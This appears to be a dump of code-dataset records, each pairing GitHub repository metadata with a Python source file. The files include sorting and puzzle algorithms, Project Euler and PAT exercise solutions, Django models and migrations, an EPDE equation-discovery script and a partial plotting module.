| UTF-8 | Python | false | false | 756 | py | 24 | 0008_auto_20150926_1129.py | 18 | 0.587302 | 0.56746 | 0 | 26 | 28.076923 | 119 |
WaterH2P/Algorithm | 2,070,174,270,608 | 37d995362378bdad21e9b2d4bffa124cb0871cf4 | 9cc3dfb89e7243595d0a76c6e0a4e77a04230eb2 | /Python/Sort/insert.py | 4cf279863488f506e1687a1158e2e980cf6dca75 | []
| no_license | https://github.com/WaterH2P/Algorithm | a369f5013eb52108402b6d8ab97cdbbdfb75cf35 | 35e18c8b81342a84dec4a5fdbb5ddf4b6447ae3d | refs/heads/master | 2022-11-28T18:19:57.145915 | 2020-08-04T12:12:13 | 2020-08-04T12:12:13 | 211,606,354 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | def sort_insert(l):
index, maxI = 0, len(l)
while index < maxI - 1 :
i = index + 1
while i > 0 and l[i] < l[i-1] :
l[i], l[i-1] = l[i-1], l[i]
i -= 1
index += 1
return l
L = [2, 5, 7, 1, 4, 3, 0]
L2 = sort_insert(L)
print(L2) | UTF-8 | Python | false | false | 286 | py | 147 | insert.py | 146 | 0.412587 | 0.34965 | 0 | 13 | 21.076923 | 39 |
thisispratt/hacktoberfest_2020 | 455,266,563,392 | b445abee05726edd70673fd34d75cb119a92a70d | 7b59cba866493d8c4a57c4b48e53a266b118e07a | /Python/1.py | 205d4a934a1d82d86d87514c19c0d67016288171 | []
| no_license | https://github.com/thisispratt/hacktoberfest_2020 | afa3d5f80da76865b35494b6f424c9995a58cc14 | c31937273d815715e38d6123d130c8f4e93968f3 | refs/heads/master | 2023-04-20T02:39:47.333188 | 2021-10-23T20:31:20 | 2021-10-23T20:31:20 | 212,836,169 | 52 | 106 | null | null | null | null | null | null | null | null | null | null | null | null | null | #command used to print something
print("Hello world")
| UTF-8 | Python | false | false | 56 | py | 61 | 1.py | 48 | 0.75 | 0.75 | 0 | 2 | 26 | 32 |
KaiOWhatmore/PE-Algorithms | 10,376,640,997,859 | 5a86dc52e7907f6f5e44437a91014918f617b791 | 226ff10abebba77f5367a7d5a1ee2d127d53da1b | /Project Euler/PE_P17_Sum Of Letters_RadiiofCircle.py | ea12d5803a56856ab41bbfeda72a0b2705bb102b | []
| no_license | https://github.com/KaiOWhatmore/PE-Algorithms | 3f69108af5cccd639c26f1981d8517ef5ce396b0 | 1758ea7e089916c14846cdd2112dd65b69e04fd1 | refs/heads/master | 2023-06-01T14:25:51.312242 | 2021-06-16T09:33:22 | 2021-06-16T09:33:22 | 377,435,785 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # dictionary to store the values
dic = {n: 0 for n in range(0, 1001)}
# intial values given manually
dic[0] = 0 # ''
dic[1] = 3 # 'one'
dic[2] = 3 # 'two'
dic[3] = 5 # 'three'
dic[4] = 4 # 'four'
dic[5] = 4 # 'five'
dic[6] = 3 # 'six'
dic[7] = 5 # 'seven'
dic[8] = 5 # 'eight'
dic[9] = 4 # 'nine'
dic[10] = 3 # 'ten'
dic[11] = 6 # 'eleven'
dic[12] = 6 # 'twelve'
dic[13] = 8 # 'thirteen'
dic[14] = 8 # 'fourteen'
dic[15] = 7 # 'fifteen'
dic[16] = 7 # 'sixteen'
dic[17] = 9 # 'seventeen'
dic[18] = 8 # 'eighteen'
dic[19] = 8 # 'nineteen'
dic[20] = 6 # 'twenty'
dic[30] = 6 # 'thirty'
dic[40] = 5 # 'forty'
dic[50] = 5 # 'fifty'
dic[60] = 5 # 'sixty'
dic[70] = 7 # 'seventy'
dic[80] = 6 # 'eighty'
dic[90] = 6 # 'ninety'
# for loop to generate the values for 21-99
# as we have alreay entered the values under
# 20 manually
for i in range(21, 100):
tens = int(i / 10) * 10
ones = i - tens
dic[i] = dic[tens] + dic[ones]
# for loop to generate values for 100-999
for i in range(100, 1000):
hundreds = int(i / 100)
tens_ones = i - hundreds * 100
# if the value of tens and ones place is 0
# just use 'hundred' instead of 'and hundred'
if tens_ones == 0:
dic[i] = dic[hundreds] + 7 # 'hundred'
else:
# 10 refers - 'and hundred'
dic[i] = dic[hundreds] + 10 + dic[tens_ones]
dic[1000] = 11 # 'one thousand'
# printing the value of each letter digit sum
print(sum(dic.values()))
| UTF-8 | Python | false | false | 1,493 | py | 23 | PE_P17_Sum Of Letters_RadiiofCircle.py | 21 | 0.5499 | 0.464836 | 0 | 84 | 16.77381 | 52 |
vnleonenko/EPDE | 8,323,646,649,874 | c35e9e79dc5c961ff927e255612b41416dbab9f7 | af562c3070916266bfce0b31fe094aef9e4d7ac7 | /tests/system/ode_textbook_interfaced.py | 9abe3bd32ed296fb9a81bd0006272af01c1c0328 | [
"BSD-3-Clause"
]
| permissive | https://github.com/vnleonenko/EPDE | fb9cfc29cec24caa9c69a7688974e50fb7dacd7d | c9f5f4a3c593dbd17987576bfcabf5554c41ed66 | refs/heads/main | 2023-08-15T02:36:05.622484 | 2021-09-30T10:40:59 | 2021-09-30T10:40:59 | 417,873,275 | 0 | 0 | NOASSERTION | true | 2021-10-16T15:46:12 | 2021-10-16T15:46:12 | 2021-10-15T15:18:18 | 2021-10-14T16:01:06 | 583 | 0 | 0 | 0 | null | false | false | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 13 14:45:14 2021
@author: mike_ubuntu
"""
import numpy as np
import epde.interface.interface as epde_alg
from epde.interface.prepared_tokens import Custom_tokens, Trigonometric_tokens, Cache_stored_tokens
from epde.evaluators import Custom_Evaluator
if __name__ == '__main__':
t = np.linspace(0, 4*np.pi, 1000)
u = np.load('/media/mike_ubuntu/DATA/EPDE_publication/tests/system/Test_data/fill366.npy') # loading data with the solution of ODE
# Trying to create population for mulit-objective optimization with only
# derivatives as allowed tokens. Spoiler: only one equation structure will be
# discovered, thus MOO algorithm will not be launched.
dimensionality = t.ndim - 1
epde_search_obj = epde_alg.epde_search()
'''
--------------------------------------------------------------------------------------------------------------------------------
Так как в этом примере мы будем использовать собственноручно-заданные семейства токенов, то для начала нужно ввести
функцию для получения значений токенов на сетке, определяющей область, для которой ищется дифф. уравнение, при фиксированных
прочих параметрах.
В случае, если семейство "порождено" одним токеном (как, например, функции, обратные значениям сетки вида 1/x^n), то
можно задать одиночную лямба-, или обычную функцию. В случае, когда в семействе предполагается несколько функций, нужно
использовать словарь с ключами - названиями функций, значениями - соответсвующими лямбда-, или обычными функциями.
Формат задания функции для оценки: не должно быть обозначенных аргументов, *args, и **kwargs. В kwargs будут передаваться все
параметры функций, а в *args - значения аргументов (координаты на сетке).
'''
custom_trigonometric_eval_fun = {'cos' : lambda *grids, **kwargs: np.cos(kwargs['freq'] * grids[int(kwargs['dim'])]) ** kwargs['power'],
'sin' : lambda *grids, **kwargs: np.sin(kwargs['freq'] * grids[int(kwargs['dim'])]) ** kwargs['power']}
'''
--------------------------------------------------------------------------------------------------------------------------------
Задаём объект для оценки значений токенов в эволюционном алгоритме. Аргументы - заданная выше функция/функции оценки значений
токенов и лист с названиями параметров.
'''
custom_trig_evaluator = Custom_Evaluator(custom_trigonometric_eval_fun, eval_fun_params_labels = ['freq', 'dim', 'power'])
'''
--------------------------------------------------------------------------------------------------------------------------------
Задам через python-словарь диапазоны, в рамках которых могут браться параметры функций оценки токенов.
Ключи должны быть в формате str и соотноситься с аргументами лямда-функций для оценки значения токенов. Так, для введённой
выше функции для оценки значений тригонометрических функций, необходимы значения частоты, степени функции и измерения сетки, по
которому берётся аргумент с ключами соответственно 'freq', 'power' и 'dim'. Значения, соответствующие этим ключам, должны быть
границы, в пределах которых будут искаться значения параметров функции при оптимизации, заданные в формате python-tuple из
2-ух элементов: левой и правой границы.
Целочисленное значение границ соответствует дискретным значеням (например, при 'power' : (1, 3),
будут браться степени со значениями 1, 2 и 3); при действительных значениях (типа float) значения параметров
берутся из равномерного распределения с границами из значения словаря. Так, например, при значении 'freq' : (1., 3.),
значения будут выбираться из np.random.uniform(low = 1., high = 3.), например, 2.7183...
'''
trig_params_ranges = {'power' : (1, 1), 'freq' : (0.95, 1.05), 'dim' : (0, dimensionality)}
'''
--------------------------------------------------------------------------------------------------------------------------------
Далее необходимо определить различия в значениях параметров, в пределах которых функции считаются идентичными, чтобы строить
уникальные структуры уравнений и слагаемых в них. Например, для эволюционного алгоритма можно считать, что различия между
sin(3.135 * x) и sin(3.145 * x) незначительны и их можно считать равными.
Задание значений выполняется следующим образом: ключ словаря - название параметра, значение - максимальный интервал, при котором токены
счиатются идентичными.
По умолчанию, для дискретных параметров равенство выполняется только при полном соответствии, а для действительно-значных аргументов
равенство выполняется при разнице меньше, чем 0.05 * (max_param_value - min_param_value).
'''
trig_params_equal_ranges = {'freq' : 0.05}
custom_trig_tokens = Custom_tokens(token_type = 'trigonometric', # Выбираем название для семейства токенов.
token_labels = ['sin', 'cos'], # Задаём названия токенов семейства в формате python-list'a.
# Названия должны соответствовать тем, что были заданы в словаре с лямбда-ф-циями.
evaluator = custom_trig_evaluator, # Используем заранее заданный инициализированный объект для функции оценки токенов.
params_ranges = trig_params_ranges, # Используем заявленные диапазоны параметров
params_equality_ranges = trig_params_equal_ranges) # Используем заявленные диапазоны "равенства" параметров
'''
Расширим допустимый пулл токенов, добавив функции, обратные значениям координат (вида 1/x, 1/t, и т.д.). Для получения их
значений зададим единую лямбда-функцию `custom_inverse_eval_fun`, и далее соответствующее семейство токенов.
'''
custom_inverse_eval_fun = lambda *grids, **kwargs: np.power(grids[int(kwargs['dim'])], - kwargs['power'])
custom_inv_fun_evaluator = Custom_Evaluator(custom_inverse_eval_fun, eval_fun_params_labels = ['dim', 'power'], use_factors_grids = True)
inv_fun_params_ranges = {'power' : (1, 2), 'dim' : (0, dimensionality)}
custom_inv_fun_tokens = Custom_tokens(token_type = 'inverse', # Выбираем название для семейства токенов - обратных функций.
token_labels = ['1/x_{dim}',], # Задаём названия токенов семейства в формате python-list'a.
# Т.к. у нас всего один токен такого типа, задаём лист из 1 элемента
evaluator = custom_inv_fun_evaluator, # Используем заранее заданный инициализированный объект для функции оценки токенов.
params_ranges = inv_fun_params_ranges, # Используем заявленные диапазоны параметров
params_equality_ranges = None) # Используем None, т.к. значения по умолчанию
# (равенство при лишь полном совпадении дискретных параметров)
# нас устраивает.
boundary = 10
custom_grid_tokens = Cache_stored_tokens(token_type = 'grid',
boundary = boundary,
token_labels = ['t'],
token_tensors={'t' : t},
params_ranges = {'power' : (1, 1)},
params_equality_ranges = None)
epde_search_obj.fit(data = u, boundary=boundary, equation_factors_max_number = 2, coordinate_tensors = [t,],
additional_tokens = [custom_trig_tokens, custom_inv_fun_tokens, custom_grid_tokens], field_smooth = False, memory_for_cache=5, data_fun_pow = 2)
epde_search_obj.equation_search_results(only_print = True, level_num = 1) # showing the Pareto-optimal set of discovered equations | UTF-8 | Python | false | false | 11,038 | py | 53 | ode_textbook_interfaced.py | 49 | 0.608216 | 0.598651 | 0 | 118 | 68.110169 | 168 |
bitmapup/patricia_trie | 14,714,557,999,374 | 50436488b9dc1024dccc7c8fcf1d1d66d0fd99a4 | 3b372f7d4e2cd18c5481a0602393c221a152665a | /coppredict/evaluation.py | e52e4e0e5127a85de0dddfec47ce15a32e5f30a6 | [
"MIT"
]
| permissive | https://github.com/bitmapup/patricia_trie | 462b1785138efef937f7b6af414c1044151f5299 | 59a82dd04f82030c9f0995859e5dfcb75ab54476 | refs/heads/main | 2023-08-11T03:46:41.848163 | 2021-09-26T05:02:14 | 2021-09-26T05:02:14 | 363,258,444 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
import os
import psutil
import time
def get_process_memory():
process = psutil.Process(os.getpid())
return process.memory_info().rss
def get_time():
time_v = time.time()
return time_v
def get_time_build(time_start, time_end, message):
if time_start != -1 and time_end != -1:
return "Time execution: " + message + str(time_end - time_start) + ' seconds' + '\n'
def get_memory_build(mem_start, mem_end, message):
if mem_start != -1 and mem_end != -1:
return "Memory Used: " + message + str((mem_end - mem_start)/1024) + ' Bytes' + '\n'
| UTF-8 | Python | false | false | 607 | py | 12 | evaluation.py | 7 | 0.609555 | 0.594728 | 0 | 25 | 23.28 | 92 |
yaelBrown/Codewars | 14,989,435,908,468 | 59b87522b345b6710fe2c5bd82bac49319b13b2e | ee9655d3ffcdb70ae68692f400096b479b39d0f7 | /Python/MovingZerosToEnd.py | 3a1fab93c3ba875b155df0058b8756cfcad6250a | []
| no_license | https://github.com/yaelBrown/Codewars | 4f123387b8c4ea6e55ec1ff5d2ae9b1d674c06cf | efa10770b593e48579c256b9d6b69deede64e9ba | refs/heads/master | 2020-11-27T16:02:43.409465 | 2020-03-20T00:59:49 | 2020-03-20T00:59:49 | 229,521,981 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Write an algorithm that takes an array and moves all of the zeros to the end, preserving the order of the other elements.
move_zeros([false,1,0,1,2,0,1,3,"a"]) # returns[false,1,1,2,1,3,"a",0,0]
"""
def move_zeros(l):
out = []
count = 0
for x in l:
if x == 0 and not type(x) == bool:
count += 1
continue
out.append(x)
if count > 0:
for y in range(count):
out.append(0)
return out
print(move_zeros([False,1,0,1,2,0,1,3,"a"]))
# print(0 == False) | UTF-8 | Python | false | false | 498 | py | 51 | MovingZerosToEnd.py | 50 | 0.586345 | 0.532129 | 0 | 28 | 16.821429 | 121 |
Gincral/cp468-artificial-intelligence | 11,098,195,505,341 | 3d31db510398dcf922c0433ffc1f478ab5f805a5 | 2cde2eb5b828745f2bce2ec11b99ce08b41b4256 | /asgn01/8-puzzle.py | d10447d99bc0c08e692f77bb4ab7e08a935a3964 | []
| no_license | https://github.com/Gincral/cp468-artificial-intelligence | d9ba5b561f3b543fed617a8de682a3ffd32d258e | 9a4c4a969ce03100dd1c63e9101ef5ef79504f02 | refs/heads/main | 2023-02-01T02:54:50.225748 | 2020-12-11T20:44:02 | 2020-12-11T20:44:02 | 300,418,950 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import random
import heapq
import sys
import csv
class node:
def __init__(self, state, action, pathCost, heuristicCost):
self.state=state #state/data, position of all tiles
self.action=action #action required to get to this state from parent
self.pathCost=pathCost #cost from initial state to this node
self.heuristicCost = heuristicCost #informed heuristic cost
class N_Puzzle:
absolute=abs #locally saving absolute function to increase speed of heuristic calculations
def __init__(self, goalState, size):
self.goal=goalState
self.goalIndex={}
for i in range(size):
self.goalIndex[goalState[i]]=i
self.size=size #length of array, 9 for 8 puzzle, 16 for 15 puzzle 25, for 24 puzzle
self.numRows=int(np.sqrt(size)) #number of rows/columns
def findTile(self,puzzle,tile):
for index in range(self.size):
if puzzle[index]==tile:
return index
def calculateHeuristicCost(self, puzzle):
if self.heuristic == "h1":
# Calculation for h1: Number of misplaced tiles
h1 = 0
for tile in range(self.size):
if puzzle[tile] != 0 and puzzle[tile] != self.goal[tile]:
h1 += 1
return h1
elif self.heuristic == "h2":
# Calculation for h2: Total Manhattan distance
h2 = 0
for row in range(self.size):
if puzzle[row] != 0:
tile = puzzle[row]
goalPos = self.goalIndex[tile]
manhattan = self.absolute(row//self.numRows - goalPos//self.numRows) + self.absolute(row%self.numRows - goalPos%self.numRows)
h2 += manhattan
return h2
elif self.heuristic == "h3":
# Linear Conflict + Manhattan Distance/Taxicab geometry
h3 = 0
conflictCount = 0
for index in range(self.size):
if puzzle[index] != 0:
tile = puzzle[index]
goalPos = self.goalIndex[tile]
manhattan = self.absolute(index//self.numRows - goalPos//self.numRows) + self.absolute(index%self.numRows - goalPos%self.numRows)
h3 += manhattan
conflictCount = self.linearConflict(index, tile, puzzle,self.goal)
h3 += conflictCount*2 #every conflict requires at least 2 moves to fix
return h3
#count how many times two tiles are in the same row but must pass each other to reach their goal positions
def linearConflict(self, index, tile, puzzle, goal):
conflictCount = 0
tileGoal = self.goalIndex[tile]
if (index//self.numRows==tileGoal//self.numRows and (tileGoal%self.numRows-index%self.numRows)>0): #right row
for i in range((index%self.numRows)+1, self.numRows):
target = puzzle[self.numRows*(index//self.numRows)+i]
if target!=0:
targetGoal = self.goalIndex[target]
if (targetGoal//self.numRows==tileGoal//self.numRows and targetGoal%self.numRows<tileGoal%self.numRows): conflictCount+=1
if (index//self.numRows==tileGoal//self.numRows and (tileGoal%self.numRows-index%self.numRows)>0):
for i in range(index//self.numRows+1, self.numRows):
target = puzzle[i%self.numRows+self.numRows*(index//self.numRows)]
if target!=0:
targetGoal = self.goalIndex[target]
if (targetGoal%self.numRows==index%self.numRows and targetGoal//self.numRows<tileGoal//self.numRows): conflictCount+=1
return conflictCount
def calcInversions(self,puzzle):
size=self.size
inversions = 0
for i in range(size):
for j in range(i+1,size):
tile1=puzzle[i]
tile2=puzzle[j]
#Make sure not to count the empty tile
if(tile1 != 0 and tile2 != 0 and tile1 > tile2):
inversions+=1
return inversions
#generate random Puzzle and check that it is solvable before setting the data
def generateRandomPuzzle(self):
solvable=False
puzzle=[0,*range(1,self.size)]
while (not solvable):
random.shuffle(puzzle)
solvable=self.checkIfSolvable(puzzle)
self.data=puzzle
def checkIfSolvable(self,puzzle):
size=self.size
inversions = self.calcInversions(puzzle)
if (size%2==1 ):
return inversions%2 == 0
else:
row=self.findTile(puzzle,0)//self.numRows
if (row%2==1 and inversions%2==1) or (row%2==0 and inversions%2==0):
return True
else:
return False
def setHeuristic(self, heuristic):
self.heuristic = heuristic
def expandNode(self, parentNode):
emptyTilePos = self.findTile(parentNode.state,0)
row = int(emptyTilePos//self.numRows)
col = int(emptyTilePos%self.numRows)
children = []
# Try to create up to 3 new possible states by moving a tile into the empty space, avoiding reversing previous move
# Move tile up
if int(row) > 0 and parentNode.action!="DOWN":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*(row-1)+col]
newState[self.numRows*(row-1)+col] = 0
children.append(node( newState, "UP", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile down
if int(row) < self.numRows - 1 and parentNode.action!="UP":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*(row+1)+col]
newState[self.numRows*(row+1)+col] = 0
children.append(node( newState, "DOWN", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile right
if int(col) > 0 and parentNode.action!="RIGHT":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*row+col-1]
newState[self.numRows*row+col-1] = 0
children.append(node( newState, "LEFT", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
# Move tile left
if int(col) < self.numRows - 1 and parentNode.action!="LEFT":
newState = parentNode.state.copy()
newState[self.numRows*row+col] = parentNode.state[self.numRows*row+col+1]
newState[self.numRows*row+col+1] = 0
children.append(node( newState, "RIGHT", parentNode.pathCost + 1, self.calculateHeuristicCost(newState)))
return children
def solve(self):
root = (self.calculateHeuristicCost(self.data),0,node(self.data, None, 0, self.calculateHeuristicCost(self.data)))
frontier = []
heapq.heappush(frontier,root) #adds root to frontier using heap method which always keeps smallest node in index 0
reached = {} #stores the nodes that have already been searched
i=0 # ensures every node has unique priority without ordering the states outside of heuristic and path cost
nodesExpanded = 0
newNode = None
while (frontier) and nodesExpanded<15000000: #continue until frontier is empty or nodes expanded reaches 15 million
newNode = heapq.heappop(frontier)[2] # Retrives first Node in priority Queue
if (newNode.state==self.goal):
return nodesExpanded, newNode.pathCost
childNodes = self.expandNode(newNode) #find children node
nodesExpanded += 1
for child in childNodes:
key = str(child.state)
if key in reached:
reachedCost = reached[key].pathCost + reached[key].heuristicCost
if key not in reached or reachedCost>child.heuristicCost+child.pathCost:
reached[key] = child
childTuple=(child.heuristicCost+child.pathCost,i,child)
heapq.heappush(frontier,childTuple) #pushes child into heap queue
i+=1
#no solution found in 15million states
return (nodesExpanded,-1)
def main():
if len(sys.argv) == 1 or sys.argv[1] == '0':
print("Please enter a valid puzzle size")
print("Enter 3, 4, 5 for 8, 15 and 24 puzzle respectively")
sys.exit()
size=int(sys.argv[1]) # 3, 4, 5 for 8, 15 and 24 puzzle respectively
goal = [*range(size*size)]
myFile = open('PreSubTest.csv', 'w', newline='\n') #File that the nodes expanded and moves are saved too for each puzzle
writer = csv.writer(myFile)
writer.writerows([["H1 Nodes","H1 Moves","H2 Nodes","H2 Moves","H3 Nodes","H3 Moves",]])
for i in range(100):
puzzle = N_Puzzle(goal,size*size)
puzzle.generateRandomPuzzle()
print("Puzzle #"+str(i+1))
print(puzzle.data)
puzzle.setHeuristic("h1")
resulth1=puzzle.solve()
puzzle.setHeuristic("h2")
resulth2=puzzle.solve()
puzzle.setHeuristic("h3")
resulth3=puzzle.solve()
results=[[resulth1[0],resulth1[1],resulth2[0],resulth2[1],resulth3[0],resulth3[1]]]
writer.writerows(results)
if __name__ == "__main__":
main() | UTF-8 | Python | false | false | 9,511 | py | 7 | 8-puzzle.py | 3 | 0.603932 | 0.587005 | 0 | 198 | 47.040404 | 149 |
hongtao510/u_tool | 9,792,525,471,320 | a00ee5aa0a8b2a97d2494d3a5341ad8517b4a60e | d89a482aaf3001bbc4515f39af9ba474e1ae6062 | /ubertool/ecosystem_inputs_db.py | 283bfbca15444b837a0a946d0d6a4130679a39f9 | []
| no_license | https://github.com/hongtao510/u_tool | 2925e3694aba81714cf83018c3f8520a7b503228 | 98c962cfb1f53c4971fb2b9ae22c882c0fae6497 | refs/heads/master | 2021-01-10T20:40:24.793531 | 2014-03-14T22:57:37 | 2014-03-14T22:57:37 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Tue Jan 31 11:55:40 2012
@author: jharston
"""
import os
os.environ['DJANGO_SETTINGS_MODULE']='settings'
from django import forms
from django.db import models
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
from google.appengine.api import users
from google.appengine.ext import db
from ecosystem_inputs import EcosystemInputs
import datetime
#YN = (('Yes','Yes'),('No','No'))
class EcoInp(forms.Form):
user_ecosystem_configuration = forms.ChoiceField(label="User Saved Ecosystem Inputs Configuration",required=True)
config_name = forms.CharField(label="EcosystemInputs Configuration Name", initial="eco-config-%s"%datetime.datetime.now())
x_poc = forms.FloatField(label='Concentration of particulate organic carbon (kg OC/L)', initial='0')
x_doc = forms.FloatField(label='Concentration of dissolved organic carbon (kg OC/L)', initial='0')
c_ox = forms.FloatField(label='Concentration of dissolved oxygen (mg O2/L)', initial='5.0')
w_t = forms.FloatField(label='Water temperature (degrees Celsius)')
c_ss = forms.FloatField(label='Concentration of suspended solids (kg/L)')
oc = forms.FloatField(label='Sediment organic Carbon (%)') | UTF-8 | Python | false | false | 1,264 | py | 740 | ecosystem_inputs_db.py | 166 | 0.744462 | 0.730222 | 0 | 27 | 45.851852 | 126 |
Holomoro/django_chase_comic | 1,082,331,771,419 | 9162fddfccad8e90cca3b1e6e41b66f718a24d7f | ad463ed0176e6ec4cdc3ca361879ea9f5d05a8b9 | /kahz_comic/comics/migrations/0003_auto_20150220_1201.py | 7ec5e33213fecc132cb5a52bf1e80777ba0c9b04 | []
| no_license | https://github.com/Holomoro/django_chase_comic | 53c0c76241a6bb7d4473765992dfa53623c29661 | 6065aa27d9cd7df110d0e76a020e8e4bae734000 | refs/heads/master | 2016-09-11T13:36:37.658299 | 2015-03-18T14:01:55 | 2015-03-18T14:01:55 | 31,089,554 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('comics', '0002_auto_20150220_0026'),
]
operations = [
migrations.RemoveField(
model_name='comic',
name='comic_image',
),
migrations.AddField(
model_name='comic',
name='comic_link',
field=models.URLField(default='http://i.imgur.com/ZXFbo4L.jpg'),
preserve_default=False,
),
]
| UTF-8 | Python | false | false | 571 | py | 5 | 0003_auto_20150220_1201.py | 2 | 0.558669 | 0.527145 | 0 | 24 | 22.791667 | 76 |
eunh1107/StudyRaspberry-Pi | 14,439,680,095,404 | 90f15e2f8a35e122b91bc93f84caad4ed0baca56 | ff6cc81031d8cbe4d538b218a5da0dfb2f3b02be | /StudyPython/210705_003/210705_003/list05.py | 6291cfae0a950bc124e58e4b290e72520afe8941 | []
| no_license | https://github.com/eunh1107/StudyRaspberry-Pi | ff19b87da861f07a963f28899db73adff31ec971 | 679af2f61b90bd6b7fcf3fe0a5fe7ad6ee5ce676 | refs/heads/main | 2023-07-04T00:07:37.453850 | 2021-08-12T17:24:14 | 2021-08-12T17:24:14 | 382,286,335 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | aa = [30, 10, 20]
print("현재의 리스트 : %s" % aa)
# aa 리스트 전체 출력은 문자열로 인식하므로 %s는 aa 리스트를 대입
aa.append(40) # 요소를 하나 추가
print("append 후의 리스트 : %s" % aa) # 요소 추가 후에 aa 리스트를 출력
aa.pop() # stack 알고리즘 적용(마지막 1개를 꺼냄) # aa 리스트의 제일 마지막 요소를 뺀다.
print("pop 후의 리스트 : %s" % aa) # 추가 후에 다시 요소를 빼고 나서 출력
aa.sort() # 리스트 요소 값들을 오름차순으로 정렬
print("sort 후의 리스트 : %s" % aa) # 정렬 후에 출력
aa.reverse() # 리스트 요소 값들을 역순으로 정렬
print("reverse 후의 리스트 : %s" % aa) # 역순 정렬 후에 출력
aa.insert(2, 222) # aa 리스트에 세 번째 위치에 222값을 추가
print("insert(2, 222) 후의 리스트 : %s" % aa) # 세 번째 위치에 추가 후에 출력
print("20값의 위치 : %d" % aa.index(20)) # 20이라는 요소 값이 있는 위치에 출력
aa.remove(222) # 222 요소 값을 리스트에서 삭제
print("remove(222) 후의 리스트 : %s" % aa) # 222 요소 값을 삭제 후에 출력
aa.extend([77,88,77]) # 다른 리스트를 확장
print("extend([77,88,77]) 후의 리스트 : %s" % aa) # 리스트 확장 후에 출력
print("77값의 개수 : %d" % aa.count(77)) # aa리스트에 77 요소 값이 몇 개 있는지 출력 | UTF-8 | Python | false | false | 1,488 | py | 57 | list05.py | 50 | 0.557082 | 0.497886 | 0 | 19 | 48.842105 | 67 |
junyechen/PAT-Advanced-Level-Practice | 11,321,533,827,375 | a4e036874e5db5d808af41b11f5b575f2063d539 | 556da038494ad93b03923577b48f89dd6d70fb48 | /1154 Vertex Coloring.py | c09e6112712bb0fa2d5489c29a08c7fbee5999f0 | []
| no_license | https://github.com/junyechen/PAT-Advanced-Level-Practice | f5c9f604c458965c2165960aaac714f69ce1057b | 401c9d3040a0273c0e2461c963b781bcebd33667 | refs/heads/master | 2020-06-19T10:55:19.564725 | 2020-05-12T10:21:14 | 2020-05-12T10:21:14 | 196,684,047 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
A proper vertex coloring is a labeling of the graph's vertices with colors such that no two vertices sharing the same edge have the same color. A coloring using at most k colors is called a (proper) k-coloring.
Now you are supposed to tell if a given coloring is a proper k-coloring.
Input Specification:
Each input file contains one test case. For each case, the first line gives two positive integers N and M (both no more than 104), being the total numbers of vertices and edges, respectively. Then M lines follow, each describes an edge by giving the indices (from 0 to N−1) of the two ends of the edge.
After the graph, a positive integer K (≤ 100) is given, which is the number of colorings you are supposed to check. Then K lines follow, each contains N colors which are represented by non-negative integers in the range of int. The i-th color is the color of the i-th vertex.
Output Specification:
For each coloring, print in a line k-coloring if it is a proper k-coloring for some positive k, or No if not.
Sample Input:
10 11
8 7
6 8
4 5
8 4
8 1
1 2
1 4
9 8
9 1
1 0
2 4
4
0 1 0 1 4 1 0 1 3 0
0 1 0 1 4 1 0 1 0 0
8 1 0 1 4 1 0 5 3 0
1 2 3 4 5 6 7 8 8 9
Sample Output:
4-coloring
No
6-coloring
No
"""
######################################################
"""
非常简单,一次通过
"""
######################################################
n, m = map(int, input().split())
edges = []
for _ in range(m):
edges.append(list(map(int, input().split())))
for _ in range(int(input())):
coloring = list(map(int, input().split()))
for a, b in edges:
if coloring[a] == coloring[b]:
print('No')
break
else:
print('%d-coloring' % len(set(coloring)))
| UTF-8 | Python | false | false | 1,735 | py | 155 | 1154 Vertex Coloring.py | 155 | 0.643234 | 0.598125 | 0 | 58 | 28.431034 | 305 |
maretec/MOHID_python_tools | 19,464,791,790,474 | 703d88fd031488b7b5fd28c0fa24bbcddb6b60bb | 282f44c3f10564489c3338f95295812fb9176a4e | /MapasDeCampos_by_hidromod/src/ModuloTimeSeriesDraw.py | 1a94d03bf6f6fc2bf17a2838bbbde252c34f015d | [
"MIT"
]
| permissive | https://github.com/maretec/MOHID_python_tools | 92eebc44be3b01bda57cfe76ac974abf5c113f58 | c69c03294e7e371be86cf980133bd8ae6829df60 | refs/heads/master | 2023-02-07T14:10:16.411017 | 2020-03-11T13:38:57 | 2020-03-11T13:38:57 | 151,395,700 | 8 | 11 | MIT | false | 2023-01-25T11:10:54 | 2018-10-03T10:27:13 | 2020-12-17T20:01:41 | 2023-01-25T11:09:54 | 242,146 | 8 | 7 | 0 | Python | false | false | import matplotlib.pyplot as plt
import matplotlib.pyplot as plt_date
import matplotlib.dates as datesMat
import logging
import sys
from matplotlib import gridspec
import matplotlib as mpl
from matplotlib.offsetbox import AnchoredText
import numpy as np
import ModuloTimeSeriesFunctions as MTSF
class Draw_timeseries:
def __init__(plottype,Timeseries,options):
if options.plot_image_type == 'timeseries':
if plottype == 1:
Draw_timeseries.drawplot_solo(options,serie1y)
elif plottype == 2:
Draw_timeseries.drawplot2(Timeseries,options)
elif plottype == 3:
DRAW.drawplot_solo(options,serie1y)
elif plottype == 4:
Draw_timeseries.drawpscatter(options,serie1y)
elif plottype == 5:
Draw_timeseries.drawplot5(Timeseries,options)
if options.plot_image_type == 'maps':
if plottype == 2:
Draw_timeseries.drawplot2Maps(Timeseries,options)
def drawplot2(Timeseries,options):
import matplotlib.pyplot as plt
